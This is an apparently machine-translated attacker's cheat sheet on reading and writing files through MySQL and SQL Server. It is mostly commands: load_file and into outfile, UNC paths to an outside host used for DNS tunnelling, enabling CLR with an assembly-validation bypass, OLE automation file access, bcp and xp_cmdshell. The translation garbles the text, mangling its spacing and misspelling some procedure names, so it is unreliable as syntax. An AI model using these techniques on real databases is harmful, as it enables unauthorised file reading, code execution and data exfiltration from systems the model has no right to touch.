I. MySQL
Read files
Common read files can be replaced by a string in hexadecimal notation.
Select load_file ('C:/boot. ini ')
Select load_file (0x633a2f626f6f742e696e69)
Select load_file ('// ecma. io/1.txt') # smb protocol
Select load_file ('\\\\ ecma. io \ 1.txt') # it can be used in DNS tunnels.
Write files
I currently know two file writing methods:
Select 0x313233 into outfile 'd:/1.txt'
Select 0x313233 into dumpfile 'd:/1.txt'
II. SQL Server
Read files
1. BULK INSERT
Create table results (res varchar (8000 ));
Bulk insert result from 'd:/1.txt ';
2. CLR integration
// Enable CLR integration
Exec sp_configure 'show advanced options', 1;
Reconfigure;
Exec sp_configure 'clr enabled', 1
Reconfigure
Create assembly sqb from 'd: \ 1.exe 'with permission_set = unsafe
The above statement can use the create assembly function to load any. NET binary file from the remote server to the database. However, it will verify whether it is a valid. NET program, leading to failure. The following is the read method.
Select master. dbo. fn_varbintohexstr (cast (content as varbinary) from sys. assembly_files
Bypass: First load a valid. NET binary file, and then append the file. The following is a bypass method.
Create assembly sqb from 'd: \ net.exe ';
Alter assembly sqb add file from 'd: \ 1.txt'
Alter assembly sqb add file from 'd: \ notnet.exe'
3. Script. FileSystemObject
# Enable Ole Automation Procedures
Sp_configure 'show advanced options', 1;
RECONFIGURE;
Sp_configure 'Ole Automation Procedures ', 1;
RECONFIGURE;
Declare @ o int, @ f int, @ t int, @ ret int
Declare @ line varchar (8000)
Exec sp_oacreate 'scripting. filesystemobject ', @ o out
Exec sp_oamethod @ o, 'opentextfile', @ f out, 'd: \ 1.txt ', 1
Exec @ ret = sp_onmethod @ f, 'readline', @ line out
While (@ ret = 0) begin print @ line exec @ ret = sp_oamethod @ f, 'readline', @ line out end
Write files
1. Script. FileSystemObject
Declare @ o int, @ f int, @ t int, @ ret int
Declare @ line varchar (8000)
Exec sp_oacreate 'scripting. filesystemobject ', @ o out
Exec sp_oamethod @ o, 'createtextfile', @ f out, 'E: \ 1.txt ', 1
Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'This is the test string'
2. Bcpcopy File (test failure, no bcp.exe)
C: \ windows> system32> bcp "select name from sysobjects" query testout.txt-c-s 127.0.0.1-U sa-p "sa"
3. xp_cmdshell
Exec xp_cmdshell 'echo test> d: \ 1.txt'
III. Oracle
Pass, Oracle is too pitfall ~~~ Almost all of them are restricted by PL/SQL.